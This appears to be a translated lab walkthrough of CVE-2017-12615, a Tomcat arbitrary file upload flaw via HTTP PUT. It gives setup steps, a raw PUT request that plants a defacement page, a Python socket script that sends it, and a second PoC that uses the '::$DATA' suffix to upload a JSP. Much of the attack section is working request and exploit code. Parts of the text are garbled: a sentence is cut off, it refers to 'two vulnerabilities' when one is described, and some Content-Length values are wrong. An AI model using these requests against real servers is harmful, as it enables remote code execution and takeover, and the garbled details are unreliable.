Vulnerability name: CVE-2017-12615, remote code execution vulnerability
When Tomcat is running on the Windows operating system and the HTTP PUT request method is enabled (for example, by setting the readonly initialization parameter to false), an attacker would likely be able to upload a JSP file containing arbitrary code to the server through a crafted request packet. The malicious code in the JSP file can then be executed by the server, causing data disclosure on the server or giving the attacker server permissions.
By exploiting the above two vulnerabilities, an attacker can execute arbitrary code on the user's server, resulting in data leakage or gaining server permissions, so the security risk is high.
Impact Range: Apache Tomcat 7.0.0-7.0.81
First, download version 7.0.81 from the Tomcat website.
Download Link: http://mirrors.shuosc.org/apache/tomcat/tomcat-7/v7.0.81/bin/apache-tomcat-7.0.81.tar.gz
Unpack the apache-tomcat-7.0.81.tar.gz file on Linux and put it into the /usr/local/ directory.
Enter the bin directory in the terminal and run ./startup.sh to start Tomcat.
Browsing to http://192.168.149.129:8080 then provides access to the
Exploit steps
Open the web.xml file in the /conf/ directory and add the readonly parameter with the value false.
Then send a PUT packet to the target server:
PUT /123.html/ HTTP/1.1
Host: 192.168.149.129:8080
User-Agent: Mozilla/5.0 (Windows; U Windows NT 6.1; He rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12
DNT: 1
Connection: close
Content-Length: 664

<HTML><Head><title>Hack by SF</title></Head><Body>hack by sf!</Body></HTML>
The packet creates a 123.html file at the root of the target.
Here we write a script using Python.
The code is as follows:
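import socket

# Request body; left empty in the original listing
poc = ""
# Same request line and headers as the PUT packet shown above
buffer = (
    "PUT /123.html/ HTTP/1.1\r\n"
    "Host: 192.168.149.129:8080\r\n"
    "User-Agent: Mozilla/5.0 (Windows; U Windows NT 6.1; He rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n"
    "DNT: 1\r\n"
    "Connection: close\r\n"
    "Content-Length: 664\r\n\r\n" + poc
)
# Open a TCP connection to the lab Tomcat instance and send the raw request
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect(("192.168.149.129", 8080))
expl.send(buffer.encode())  # sockets take bytes in Python 3
expl.close()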
After running:
By modifying the 123.html suffix, any file can be uploaded.
Also attached is the Tomcat 7.0.79 PoC:
PUT /aedoo.jsp::$DATA HTTP/1.1
Host: 192.168.1.1:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8
Cookie:
Connection: close
Content-Length: 22

your JSP ma